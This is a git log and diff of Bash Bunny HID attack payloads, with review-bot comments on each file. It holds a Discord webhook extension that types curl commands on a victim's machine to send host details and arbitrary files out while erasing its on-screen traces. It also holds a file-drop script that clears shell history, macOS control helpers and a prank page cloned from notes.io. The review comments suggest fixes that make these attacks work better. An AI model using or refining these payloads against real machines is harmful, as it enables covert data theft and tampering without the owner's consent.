


Jules Nieves e7147a2b1d
Merge c1612f99c8 into 8d901a02a8 2024-09-25 22:55:59 -04:00
Peaks 8d901a02a8
Merge pull request #318 from bg-wa/drop
[Extension + Payload] The Ol'Drop'n'Run
2024-09-05 12:12:31 -04:00
Peaks 14fa7c490e
Merge pull request #322 from bg-wa/cross-platform-cmd-prompt
Cross platform command prompt extension
2024-09-05 12:04:31 -04:00
Peaks 2559d728b1
Merge pull request #376 from thedragonkeeper/keylogger
KeyLogger
2024-09-05 12:01:41 -04:00
Peaks 257081013d
Merge pull request #650 from quentinlamamy/master
Submit Discord exfiltration extension + Github Information Exfiltration Payload
2024-09-03 12:11:48 -04:00
Peaks e6c3876429
Merge pull request #328 from GermanNoob/SEWAIT
[EXTENSION] SEWAIT - social engineering wait - a small extension to DarrenKitchen's wait
2024-09-03 12:07:02 -04:00
Peaks 0e51172697
Merge pull request #345 from Zappus/master
New IR Payload - MalwareBunny
2024-09-03 11:56:19 -04:00
Quentin Lamamy 5ce34d6819 Update OSX Extension 2024-09-02 04:38:47 +02:00
Quentin Lamamy a57046358b
Merge branch 'hak5:master' into master 2024-09-02 04:35:16 +02:00
quentinlamamy 5cfae30936 Add github information exfiltration payload 2023-08-20 12:06:24 +02:00
quentinlamamy 971a981c9f Submit Discorde exfiltration extension 2023-07-31 18:56:30 +02:00
TheDragonkeeper 963c000ab9 added keylogger 2019-04-06 00:50:03 +01:00
Julz4455 c1612f99c8
Delete index.html 2019-02-08 23:05:02 -05:00
Julz4455 40834a14b1
Delete payload.txt 2019-02-08 23:04:47 -05:00
Julz4455 049d431d58
Delete README.md 2019-02-08 23:04:34 -05:00
Julz4455 315ba42d69
Add payload and html from upload 2019-02-08 23:03:57 -05:00
Julz4455 f360d8caac
Create README.md 2019-02-08 23:03:23 -05:00
Julz4455 d9e9d271ec
Delete Chromebook-Demo 2019-02-08 23:01:01 -05:00
Julz4455 d843fa2b3f
Create Chromebook-Demo 2019-02-08 23:00:31 -05:00
Julz4455 a3d5ed1c3a
Add Payload.txt and index.html from Upload 2019-02-08 22:51:28 -05:00
Julz4455 cbf4512f17
Update README.md 2019-02-08 22:49:59 -05:00
Julz4455 732740a24e
Create README.md for Chromebook Demo 2019-02-08 22:49:37 -05:00
Zappus 4731402ad9 added MalwareBunny
added MalwareBunny payload
2018-05-26 09:34:37 -04:00
bg-wa a479964196 Win New file cleanup 2018-02-13 21:57:22 -08:00
bg-wa 17e0b3d50c Multi-OS (Untested) 2018-02-13 21:55:04 -08:00
GermanNoob 18e36a88b0
Create sewait.sh 2018-02-11 12:01:33 +01:00
bg-wa 5f06649cd2 Cross platform command prompt extension 2018-01-30 10:38:52 -08:00
bg-wa 9ab8820cc5 Moved payload to execution folder 2018-01-27 20:45:55 -08:00
bg-wa b3b9f75200 All Working with executable and overwite options 2018-01-27 18:33:25 -08:00
bg-wa 5c764849f3 Check Point 2018-01-27 10:31:59 -08:00
bg-wa afdafb27d6 The Ol'Drop'n'Run 2018-01-27 00:09:35 -08:00
bg-wa 821105a6a3 Cleanup LINUX only... 2018-01-27 00:05:57 -08:00
bg-wa 31ae33e78a Start of drop file 2018-01-26 20:36:59 -08:00
30 changed files with 1496 additions and 0 deletions

86
payloads/extensions/discord.sh Executable file

@ -0,0 +1,86 @@
#!/bin/bash
#
# Title: Discord Extension
# Description: Interact with discord webhook to exfiltrate text or files
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
# Version: 1.0
# Category: Extension
#
# To use this extension, you need to create a webhook on discord and get the webhook id and token
# During your setup steps, you need to set the DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN variables
# DISCORD_WEBHOOK_ID="<DISCORD_WEBHOOK_ID>""
# DISCORD_WEBHOOK_TOKEN="<DISCORD_WEBHOOK_TOKEN>"
function DISCORD() {
case $1 in
# @desc Initialize the exfiltration session by posting an embed message on discord with host information
# @usage DISCORD INIT
# @info This command need a $BB_HOST_* variables (Set by default if you use my OSX extension)
"INIT")
curl_location="https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN"
curl_header="Content-Type: application/json"
Q STRING "printf '\e7'"
Q ENTER
Q STRING "curl --location '$curl_location'"
Q STRING " --header '$curl_header'"
Q STRING " --data '{\"embeds\": [{\"author\": {\"name\": \"New exfiltration session\",\"icon_url\": \"https://cdn-icons-png.flaticon.com/512/2/2235.png\"},\"color\": \"15258703\",\"fields\": [{\"name\":\"OS\",\"value\":\""
Q STRING "'\${BB_HOST_OS}'"
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
Q STRING "'\${BB_HOST_IP_V4}'"
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
Q STRING "'\${BB_HOST_IP_V6}'"
Q STRING "\",\"inline\":true},{\"name\":\"User\",\"value\":\""
Q STRING "'\${BB_HOST_USER}'"
Q STRING "\",\"inline\":true}]"
Q STRING "}]}'"
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER
;;
"SEND")
case $2 in
# @desc Send a message to discord via webhook
# @usage DISCORD SEND MSG $yourMessage
"MSG")
if [[ "$3" == *"$"* ]]; then
message="'$3'"
else
message=$3
fi
Q STRING "printf '\e7'"
Q ENTER
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --header 'Content-Type: application/json' --data '{\"content\": \"$message\"}' && printf '\e[3A\e[K\e[0J'"
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER
;;
# @desc Send a file to discord via webhook
# @usage DISCORD SEND FILE $yourFilePath
"FILE")
Q STRING "printf '\e7'"
Q ENTER
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --form '=@\"$3\"' && printf '\e[3A\e[K\e[0J'"
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER
;;
esac
;;
esac
}
export -f DISCORD
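Review bot: Nothing checks that DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN are set before they are interpolated into curl_location at the top of the INIT branch, so an unconfigured payload types a half-formed webhook URL on the target and fails silently; add `: "${DISCORD_WEBHOOK_ID:?DISCORD_WEBHOOK_ID is not set}"` and the same line for the token at the start of DISCORD. The second embed field is labelled "Public ip" for both the IPv4 and the IPv6 value; the IPv6 line should read `Q STRING "\",\"inline\":true},{\"name\":\"Public ipv6\",\"value\":\""`. The header example `DISCORD_WEBHOOK_ID="<DISCORD_WEBHOOK_ID>""` carries a stray trailing quote that will be copied into setup blocks verbatim.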

103
payloads/extensions/drop.sh Normal file

@ -0,0 +1,103 @@
#!/bin/bash
#
# DROP v1 by bg-wa
# Simplifies dropping files from HID attacks for LINUX
# Usage: DROP [OS] bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
#
# Example:
# DROP UNITY /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
source ./run.sh
function DROP() {
os=$1
source=$2
destination=$3
overwrite=$4
executable=$5
case "$os" in
WIN)
RUN WIN powershell
;;
OSX)
RUN OSX terminal
;;
UNITY)
RUN UNITY terminal
;;
LINUX)
RUN LINUX terminal
;;
*)
RUN UNITY terminal
;;
esac
QUACK DELAY 1000
if "$overwrite" == "true"
then
case "$os" in
WIN)
QUACK STRING del "$destination"
;;
*)
QUACK STRING rm "$destination"
;;
esac
QUACK ENTER
QUACK DELAY 500
fi
case "$os" in
WIN)
QUACK STRING fsutil file createnew "$destination"
QUACK ENTER
QUACK DELAY 500
QUACK STRING notepad.exe "$destination"
QUACK ENTER
QUACK DELAY 1000
;;
*)
QUACK STRING vi "$destination"
QUACK ENTER
QUACK DELAY 500
QUACK STRING i
;;
esac
while IFS= read -r data
do
QUACK STRING "$data"
QUACK ENTER
done < "$source"
QUACK DELAY 500
case "$os" in
WIN)
QUACK CTRL s
QUACK CRTL x
;;
*)
QUACK ESC
QUACK ENTER
QUACK STRING :wq
QUACK ENTER
if "$executable" == "true"
then
QUACK STRING chmod +x "$destination"
QUACK ENTER
QUACK DELAY 500
fi
QUACK STRING history -c
QUACK ENTER
QUACK STRING exit
QUACK ENTER
;;
esac
}
export -f DROP
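Review bot: `if "$overwrite" == "true"` in the overwrite block, and the same form in the executable block of the final case, is not a test: bash runs the value of the variable as a command with `==` and `true` as its arguments, which only appears to work because `true` and `false` happen to be commands — any other value (empty, `yes`, `1`) produces "command not found" and takes the wrong branch. Both lines should be `if [[ "$overwrite" == "true" ]]; then` and `if [[ "$executable" == "true" ]]; then`. In the WIN arm of the last case, `QUACK CRTL x` is a typo for `QUACK CTRL x`, so notepad is never closed. `source ./run.sh` resolves against the caller's working directory rather than the extension's own location; presumably that holds on the Bunny because extensions are loaded from that directory, but it is worth confirming.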

278
payloads/extensions/osx.sh Executable file

@ -0,0 +1,278 @@
#!/bin/bash
#
# Title: OSX Extension
# Description: Allow a bunch of osx interaction
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
# Version: 2.0
# Category: Extension
function OSX() {
case $1 in
"TERMINAL")
case $2 in
# @desc Open a terminal
# @usage OSX TERMINAL OPEN
"OPEN")
Q GUI SPACE
Q STRING terminal
Q ENTER
;;
# @desc Initialize the terminal
# Make the PS1 nicer (just because I like it)
# Grab Host information and store it in BB_OSX vars
# @usage OSX TERMINAL INIT
# @info This command need a focused terminal
"INIT")
Q STRING "bash"
Q ENTER
Q STRING "clear"
Q ENTER
Q STRING "printf '\e7'"
Q ENTER
Q STRING "export PS1='\e[0;31mbashbunny>\e[m '"
Q ENTER
Q STRING 'BB_HOST_USER=$(whoami)'
Q ENTER
Q STRING 'BB_HOST_NAME=$(hostname)'
Q ENTER
Q STRING "BB_HOST_OS='OSX'"
Q ENTER
Q STRING 'BB_HOST_IP_V4=$(curl -s ipinfo.io/ip)'
Q ENTER
Q STRING 'BB_HOST_IP_V6=$(curl -s ident.me)'
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER
;;
# @desc Minimize the terminal
# @usage OSX TERMINAL MINIMIZE
# @info This command need a focused terminal
"MINIMIZE")
Q STRING 'printf \e[2t'
Q ENTER
;;
# @desc Resize the focused terminal
# @usage OSX TERMINAL RESIZE $width $height
# @param <integer> $width The terminal width
# @param <integer> $height The terminal height
# @info This command need a focused terminal
"RESIZE")
Q STRING "printf '\e[8;'$4';'$3't' && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;
# @desc Clear the focused terminal
# @usage OSX TERMINAL ZOOM
# @info This command need a focused terminal
"CLEAR")
Q STRING clear
Q ENTER
;;
# @desc Close all terminal
# @usage OSX TERMINAL CLOSE
# @info This command need a focused terminal
"CLOSE")
Q STRING history -c
Q ENTER
Q STRING killall Terminal
Q ENTER
;;
# @desc Change terminal window name
# @usage OSX TERMINAL NAME <WINDOW_NAME>
# @info This command need a focused terminal
"NAME")
Q STRING "printf '\033]0;'$3'\007' && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;
esac
;;
"NETWORK")
case $2 in
"WIFI")
case $3 in
# @desc Enable wifi
# @usage OSX NETWORK WIFI ENABLE
"ENABLE")
Q STRING "networksetup -setairportpower en0 on"
Q ENTER
;;
# @desc Disable wifi
# @usage OSX NETWORK WIFI DISABLE
"DISABLE")
Q STRING "networksetup -setairportpower en0 off"
Q ENTER
;;
# @desc Connect to a wifi network
# @usage OSX NETWORK CONNECT $ssid $password
# @arg <string> Wifi SSID
# @arg <string> Wifi Password
"CONNECT")
Q STRING "networksetup -setairportnetwork en0 $4 $5"
Q ENTER
;;
esac
;;
"ETHERNET")
;;
esac
;;
"SESSION")
case $2 in
# @desc Shutdown the computer
# @usage OSX SESSION SHUTDOWN
"SHUTDOWN")
Q STRING "osascript -e 'tell app \"System Events\" to shut down'"
Q ENTER
;;
# @desc Restart the computer
# @usage OSX SESSION RESTART
"RESTART")
Q STRING "osascript -e 'tell app \"System Events\" to restart'"
Q ENTER
;;
# @desc Lock the computer
# @usage OSX SESSION LOCK
"LOCK")
Q STRING "osascript -e 'tell app \"System Events\" to sleep'"
Q ENTER
;;
# @desc Logout current session
# @usage OSX SESSION LOGOUT
"LOGOUT")
Q STRING "osascript -e 'tell app \"System Events\" to log out'"
Q ENTER
;;
"GET_USER")
#Q STRING "BB_OSX_USER=$(who | grep console | cut -d ' ' -f 1)"
Q STRING 'BB_OSX_USER=$(whoami)'
Q ENTER
;;
esac
;;
"SOUND")
case $2 in
"PLAY")
Q STRING "afplay $3"
;;
# @desc Change the computer volume
# @usage OSX MISC VOLUME $volumeValue
# @arg <integer> An integer between 0 and 10
"VOLUME")
Q STRING "osascript -e 'set Volume $3'"
Q ENTER
;;
esac
;;
"NOTIFICATION")
case $2 in
"CLEAR")
Q STRING "ps -e | grep /NotificationCenter | grep app | cut -d ' ' -f 1 | xargs kill -9 && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;
"DISPLAY")
if [ -z $6]; then
$6=${1:-"Purr"}
fi
Q STRING "osascript -e 'display notification \"$3\" with title \"$4\" subtitle \"$5\" sound name \"$6\"'"
Q ENTER
;;
esac
;;
"MISC")
case $2 in
# @desc Show or hide desktop icon
# @usage OSX MISC DESKTOP_ICON $action
# @arg <string> HIDE | void
"DESKTOP_ICON")
if [ $3 == "HIDE" ]; then
Q STRING "defaults write com.apple.finder CreateDesktop -bool false && killall Finder"
Q ENTER
else
Q STRING "defaults write com.apple.finder CreateDesktop -bool true && killall Finder"
Q ENTER
fi
;;
# @desc Change wallpaper with the specified url image
# @usage OSX MISC WALLPAPER_URL
"WALLPAPER_URL")
Q STRING "cd ~/Desktop"
Q ENTER
Q STRING "curl $3 > img.bb"
Q ENTER
Q STRING "sqlite3 ~/Library/Application\ Support/Dock/desktoppicture.db \"update data set value = '~/Desktop/img.bb'\" && killall Dock"
Q ENTER
;;
# @desc Say something in the way of bigben
# @usage OSX MISC SAY <VOICE> <TEXT_TO_SAY>
# @info Need a focused terminal
"SAY")
Q STRING "say -v $3 $4 && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;
esac
;;
esac
}
export -f OSX
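Review bot: The default-sound handling in NOTIFICATION DISPLAY is broken: `[ -z $6]` lacks the space before `]`, and `$6=${1:-"Purr"}` is not an assignment (a positional parameter cannot be assigned that way, and it defaults from $1 rather than $6), so bash tries to execute the expansion as a command; replace those three lines with `sound=${6:-Purr}` and use `sound name \"$sound\"` in the osascript string. SOUND PLAY queues `Q STRING "afplay $3"` without the `Q ENTER` every sibling branch sends, so the command is typed but never run. The usage comments are out of step with the code in several places: CLEAR is documented as `OSX TERMINAL ZOOM`, WIFI CONNECT as `OSX NETWORK CONNECT` (the real path is `OSX NETWORK WIFI CONNECT`), and VOLUME as `OSX MISC VOLUME` although it lives under SOUND.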


@ -0,0 +1,126 @@
#!/bin/bash
################################################################################
# Quickly get to a prompt on any platform with the BashBunny
#
# How this works?
# 1) Once the library is included in your payload, launch terminal\powershell\run
# with:
# PROMPT [OS]
# 2) OS options are:
# "AUTO" : Default - Hak5 2124 cross platform code
# "UNITY" : Launches Terminal in Unity
# "UNITY_RUN" : Opens run prompt in Unity
# "MAC" : Launches Terminal in OSX
# "POWERSHELL" : Launches Powershell in Windows
# "WINDOWS_RUN": Opens run prompt in Windows
# 3) To close a prompt use:
# CLOSE_PROMPT [OS]
################################################################################
################################################################################
# Start HID Prompt
################################################################################
function PROMPT() {
if [ -z "$1" ]; then
OS="AUTO"
else
OS=$1
fi
#AUTO
if [ "${OS}" = "AUTO" ]; then
LED G B 100
QUACK ALT F2
QUACK DELAY 50
QUACK GUI SPACE
QUACK DELAY 50
QUACK GUI r
clear_active_input
wait_enter_wait 200 1000
fi
#UNITY
if [ "${OS}" = "UNITY" ]; then
LED R B 100
QUACK GUI
clear_active_input
QUACK STRING terminal
wait_enter_wait 200 1000
fi
#UNITY_RUN
if [ "${OS}" = "UNITY_RUN" ]; then
LED R B 100
QUACK ALT F2
fi
#MAC
if [ "${OS}" = "MAC" ]; then
LED R B G 100
QUACK GUI SPACE
clear_active_input
QUACK STRING terminal
wait_enter_wait 200 1000
fi
#POWERSHELL
if [ "${OS}" = "POWERSHELL" ]; then
LED B 100
QUACK GUI
QUACK DELAY 500
QUACK powershell
wait_enter_wait 200 1000
fi
#WINDOWS_RUN
if [ "${OS}" = "WINDOWS_RUN" ]; then
LED B 100
QUACK GUI r
QUACK DELAY 500
fi
LED 0
}
function CLOSE_PROMPT() {
if [ -z "$1" ]; then
QUACK ALT F4
else
if [ "$1" = "MAC" ]; then
QUACK GUI w
else
QUACK ALT F4
fi
fi
}
# HELPER FUNCTIONS
function wait_enter_wait() {
if [ -z "$1" ]; then
BEFORE_WAIT=100
else
BEFORE_WAIT=$1
fi
if [ -z "$2" ]; then
AFTER_WAIT=100
else
AFTER_WAIT=$2
fi
QUACK DELAY ${BEFORE_WAIT}
QUACK ENTER
QUACK DELAY ${AFTER_WAIT}
}
function clear_active_input() {
QUACK DELAY 50
QUACK BACKSPACE
QUACK DELAY 100
}
export -f PROMPT
export -f CLOSE_PROMPT
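Review bot: `QUACK powershell` in the POWERSHELL branch is missing the STRING keyword, so it is presumably passed on as an unknown Ducky command rather than typed; it should be `QUACK STRING powershell`. PROMPT, wait_enter_wait and clear_active_input assign OS, BEFORE_WAIT and AFTER_WAIT as globals, which leaks them into the calling payload and can clobber a caller's OS variable; declare them with `local`. The two helpers are not exported alongside PROMPT and CLOSE_PROMPT, so if PROMPT is ever invoked from a child shell that only inherits exported functions they will be undefined — fine when the extension is sourced, but worth a comment or an `export -f` for consistency.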


@ -0,0 +1,23 @@
#!/bin/bash
# Social engineering wait by GermanNoob
#
# This extension can be used if no hidden access to the victim computer is possible and you have to social engineer your way to the target
# This script will mount as a standard drive and wait until the attacker starts the real payload by changing the switch position
#
# This is just a small extension to DarrenKitchen's WAIT
function SEWAIT() {
LED SPECIAL
ATTACKMODE STORAGE
GET SWITCH_POSITION
TEST=$SWITCH_POSITION
LED SPECIAL2
while true
do GET SWITCH_POSITION
if [ $SWITCH_POSITION != $TEST ]; then break; fi
sleep 1
done
}
export -f SEWAIT
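Review bot: The comparison `[ $SWITCH_POSITION != $TEST ]` in the poll loop leaves both sides unquoted, so if either value is empty the test fails with a syntax error instead of comparing, and the loop keeps spinning; write `if [ "$SWITCH_POSITION" != "$TEST" ]; then break; fi`. `TEST` is a generic global name that can collide with the calling payload; a name such as `initial_position` declared `local` would be safer. Putting `GET SWITCH_POSITION` on its own line after `do` matches the style of the rest of the file.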


@ -0,0 +1,24 @@
# Chromebook Demo Payload
Author: Julz4455
Version: 1.2
## Description
Send a certain message to the victim of your hack.
This can be a message to lock thier pc or to watch out because of an upcoming hack.
## Configuration
Configure by changing the message, header, hacker name, and finale.
This can help send a certain message to the victim of your hack.
## STATUS
| LED | Status |
| ---------| ----------------------------------- |
| SETUP | Setting up the ATTACKMODE with HID |
| SPECIAL | Setting up Internet and fake page |
| ATTACK | The Attack is being carried out |
| CLEANUP | Cleaning up the Attack with HID |
| FINISH | Attack has been finished |


@ -0,0 +1,200 @@
<!DOCTYPE html>
<!--
/***
* ███╗ ██╗ ██████╗ ████████╗███████╗███████╗ ██╗ ██████╗
* ████╗ ██║██╔═══██╗╚══██╔══╝██╔════╝██╔════╝ ██║██╔═══██╗
* ██╔██╗ ██║██║ ██║ ██║ █████╗ ███████╗ ██║██║ ██║
* ██║╚██╗██║██║ ██║ ██║ ██╔══╝ ╚════██║ ██║██║ ██║
* ██║ ╚████║╚██████╔╝ ██║ ███████╗███████║██╗██║╚██████╔╝
* ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝╚═╝ ╚═════╝
* FAST • EASY • SHORT
* hello@notes.io
* twitter.com/notesio
* fb.com/notesio
*/
-->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr" lang="tr">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<title>Online Notes Services | Fast . Easy . Short | Notes.io </title>
<meta name="viewport" content="width=device-width, initial-scale=0.7">
<meta name="description"
content="Notes.io is a web-based application for taking notes. You can take your notes and share with others by providing the shorten url to a friend.">
<meta name="keywords" content="notes,note,online note,online note service,past note,short note,note shortener">
<meta name="google-site-verification" content="4Ugv3pjfk9ljCxFSgXA_cITKo3WzpgkcoWPI2wX1Swk"/>
<link rel="image_src" href="http://notes.io/theme/macNew/images/logo.png"/>
<link href="http://notes.io/theme/macNew/css/notesIO.css" rel="stylesheet" type="text/css"/>
<link href="http://notes.io/theme/macNew/css/reset-min.css" rel="stylesheet" type="text/css"/>
</head>
<body><img src="http://notes.io/theme/macNew/images/background.jpg" class="bg" alt="notes.io background"/>
<div class="mainDiv"><div class="whatIsNotesIO"><img src="http://notes.io/theme/macNew/images/whatisnotesio.png" alt="what is notes.io" /></div> <div class="programArea">
<table width="100%">
<tr>
<td class="barsol"></td>
<td class="barback"><a href="http://notes.io"><img src="http://notes.io/theme/mac/images/logo.png" class="logo"
alt="notes.io logo"/></a>
<div class="slogan">
<img src="http://notes.io/theme/macNew/images/fastEasyShort.png" alt="Fast | Easy | Short"/>
<p>
Notes.io is a Note Shortener // Fast | Easy | Short
</p>
</div>
<div class="menu">
<input id="btnShort" type="button" class="short" value="short"/>
<a href="#" class="comingsoon">Coming Soon</a>
<input id="btnAccount" type="button" class="account" value="Account"/>
<input id="" type="button" class="myNotesDisable" value="Account" /> </div>
</td>
<td class="barsag"></td>
</tr>
</table>
<div class="notesArea">
<textarea id="notesTextAreaID" class="notesTextArea" rows="2" cols="25" autofocus></textarea>
</div>
<table width="100%">
<tr>
<td class="notespagebottom1">&nbsp;</td>
<td class="notespagebottom2">&nbsp;</td>
<td class="notespagebottom3">&nbsp;</td>
</tr>
</table>
</div>
<div class="adverArea">
<div class="close"></div>
<table width="100%">
<tr>
<td class="barsol">&nbsp;</td>
<td class="barback">
<center>
<img src="http://notes.io/theme/macNew/images/whatisnotesio.png" alt="what is notes.io" class="adverWhatsNotes" />
</center>
</td>
<td class="barsag">&nbsp;</td>
</tr>
</table>
<div class="notesArea">
<div class="notesTextArea">
<p>
Notes.io is a web-based application for taking notes. You can take your notes and share with others by providing the shorten url to a friend.
</p><br />
<p><b>Fast:</b> Notes.io is built for speed and performance. You can take notes quickly and browse your archive.</p>
<p><b>Easy:</b> Notes.io doesnt require installation. Just write and share shorten link!</p>
<p><b>Short:</b> Notes.ios url just 8 character. Youll get shorten link of your note when you want to share. (<b>Ex:</b> <a href="http://notes.io/q" style="font-size: 12px"> notes.io/q </a></p>
<p><b>Contact:</b> hello@notes.io</p>
</div>
</div>
<table width="100%">
<tr>
<td class="notespagebottom1">&nbsp;</td>
<td class="notespagebottom2">&nbsp;</td>
<td class="notespagebottom3">&nbsp;</td>
</tr>
</table>
</div>
</div>
<div id="char" class="char">0 KB</div>
<div id="messageback" class="messageback"></div>
<div class="messageBOXback"></div>
<div id="messageBOX" class="message">
<table cellpadding="0" cellspacing="0" style="width: 100%">
<tr>
<td class="auto-style1">&nbsp;</td>
<td class="auto-style2">
<div class="closeBTNpopup" id="shortClose"></div>
<h1>Long File</h1></td>
<td class="auto-style3">&nbsp;</td>
</tr>
<tr>
<td class="auto-style4">&nbsp;</td>
<td class="auto-style9"><p>For written notes was greater than 18KB Unable to shorten.</p>
<p>To be smaller than 18KB, please organize your notes, or sign in.</p></td>
<td class="auto-style5">&nbsp;</td>
</tr>
<tr>
<td class="auto-style6">&nbsp;</td>
<td class="auto-style7">&nbsp;</td>
<td class="auto-style8">&nbsp;</td>
</tr>
</table>
</div>
<div id="msgBOXshort" class="message">
<table cellpadding="0" cellspacing="0" style="width: 100%">
<tr>
<td class="auto-style1">&nbsp;</td>
<td class="auto-style2">
<div class="closeBTNpopup" id="shortClose"></div>
<h1 id="shortNoteH1">Shortened Note Link</h1></td>
<td class="auto-style3">&nbsp;</td>
</tr>
<tr>
<td class="auto-style4">&nbsp;</td>
<td class="auto-style9">
<div id="sonuc"><span><img src="http://notes.io/theme/macNew/images/ajax-loader.gif" class="looding"
alt="Looding Image"/></span></div>
</td>
<td class="auto-style5">&nbsp;</td>
</tr>
<tr>
<td class="auto-style6">&nbsp;</td>
<td class="auto-style7">&nbsp;</td>
<td class="auto-style8">&nbsp;</td>
</tr>
</table>
</div>
<div class="footer">
<p>
<a href="https://itunes.apple.com/us/app/direct-message-for-whatsapp/id1411992307?ls=1&amp;mt=8" target="_blank">Direct
Message for Whatsapp <br/><img src="http://notes.io/theme/banners/directMessageBanner.jpg" width="970" height="250"
title="Type number, press the direct message button and start whatsapp chat without saving new contact.Keep it fast,secret and clean."/></a>
</p>
<p><a href="http://www.sorgulamayap.com" target="_blank">Alan adı sorgulama servisi <br/><img
src="http://notes.io/theme/banners/468-60.gif" title="sorgulama yap"/></a></p>
<p><a href="http://www.md5generator.org" target="_blank">md5 generator<br/><img
src="http://notes.io/theme/banners/banner468-60.jpg" title="md5 generator"/></a></p><a
href="http://www.metromedya.com/tr/hizmetlerimiz/ios-uygulama-gelistirme.html" target="_blank">ios
programlama </a><a href="http://www.iosprogramlama.com" target=”_blank”>ios programlama</a>
<p style="text-align: right;width: 98%">V.2.0.8</p>
<div class="socialArea">
<p>
<iframe src="http://notes.io/socialButton.php" name="myframe" width="162" height="62" frameborder="0"
allowtransparency="true"></iframe>
</p>
<br>
<p>Copyright 2018 <a href="http://www.metromedya.com/en" target="_blank">Metromedya</a></p>
<p>We'd love to hear from you. Please email us at <a href="mailto:hello@notes.io">hello@notes.io</a></p>
</div>
<script type="text/javascript">var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-18039671-1']);
_gaq.push(['_trackPageview']);
(function () {
var ga = document.createElement('script');
ga.type = 'text/javascript';
ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(ga, s);
})();</script>
</div>
<script src="http://notes.io/scripts/jquery-1.6.1.min.js" type="text/javascript"></script>
<script src="http://notes.io/scripts/notes.js" type="text/javascript"></script>
</body>
</html>
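Review bot: The demo page is not self-contained: jQuery, notes.js, the stylesheets, images and the Google Analytics snippet are all fetched from notes.io and google-analytics.com over plain http (the two script tags at the end and the links in the head), so the page only renders when the target has Internet access and the visit is reported to those third parties, including the original site's `UA-18039671-1` analytics account and its google-site-verification token. If the intent is a page served locally from the Bunny, the remote script, stylesheet and analytics references should be removed or replaced with local copies. `id="shortClose"` is used on two elements, which is invalid HTML.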


@ -0,0 +1,66 @@
#!bin/bash
CUCUMBER PLAID
LED SETUP
GET HOST_IP
GET SWITCH_POSITION
ATTACKMODE HID ECM_ETHERNET VID_0x05ac PID_0x021e
MESSAGE="I Will learn to lock my computer"
HEADER="Write the following 20 times: ${MESSAGE}"
HACKER_NAME="Mr. Robot's Son"
FINALE="Understand now?"
LED SPECIAL
cd /root/udisk/payloads/$SWITCH_POSITION
iptables -A OUTPUT -p udp --dport 80 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening (credit audibleblink)
while ! nc -z localhost 80; do sleep 0.2; done
LED ATTACK
Q GUI
Q DELAY 5000
Q STRING "http://${HOST_IP}/index.html"
Q DELAY 750
Q ENTER
Q DELAY 10000
Q CONTROL R
Q DELAY 10000
Q STRING "${HEADER}"
Q ENTER
Q ENTER
i="0"
while [ $i -lt 19 ]; do
Q STRING "${MESSAGE}"
Q DELAY 100
Q ENTER
i=$[$i+1]
Q DELAY 200
done
Q ENTER
Q STRING "${FINALE}"
Q ENTER
Q STRING "Hacked By: ${HACKER_NAME}"
Q ENTER
LED CLEANUP
i="0"
while [ $i -lt 30 ]; do
Q UP
i=$[$i+1]
Q DELAY 100
done
LED W 100
sync
sleep 3
sync
LED FINISH
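Review bot: The shebang `#!bin/bash` is missing the leading slash, so the file cannot be executed as a script on its own (the Bunny presumably sources it, which masks the error); use `#!/bin/bash`. `python -m SimpleHTTPServer 80 &` serves the whole `/root/udisk/payloads/$SWITCH_POSITION` directory, payload.txt included, to anyone on the link, and it is never stopped in the CLEANUP stage; record its PID with `http_pid=$!` and `kill "$http_pid"` before `LED FINISH`, or serve from a subdirectory that holds only index.html. `i=$[$i+1]` is the deprecated arithmetic form in both loops; `i=$((i+1))` is the equivalent. The `iptables -A OUTPUT -p udp --dport 80 -j DROP` rule targets UDP while SimpleHTTPServer listens on TCP — I cannot tell from here what it is meant to achieve, so a comment would help.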


@ -0,0 +1,36 @@
# Malware Bunny
## Overview
This Bash Bunny module is used to install many tools used for reverse engineering and malware analysis.
2 Operation Modes
* Web UI for quick access to samples
* SSH access for analysis sessions
## Getting Started
1. Get Bunny to access the Internet
2. Install all tools and components
* or - run setup.sh to install everything
* or - manually install every tool from setup scripts
3. Boot Bunny in Arming mode and upload payload files to switch1 and switch2
4. Boot Bunny in switch1 mode to access web interface
5. Boot Bunny in switch2 mode to access ssh interface
Web interface is meant long analysis sessions with minimal use, therefore CUCUMBER is enabled.
## Software Installed
1. viper v1.2
2. ssdeep v2.14.1
3. yara v3.7.0
4. pyew
6. featherduster
7. capstone
8. binwalk
9. dshell
10. wabt
11. peepdf
12. unzip
13. punbup


@ -0,0 +1,45 @@
#!/bin/bash
# Title: Malware Bunny
# Description: binwalk install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
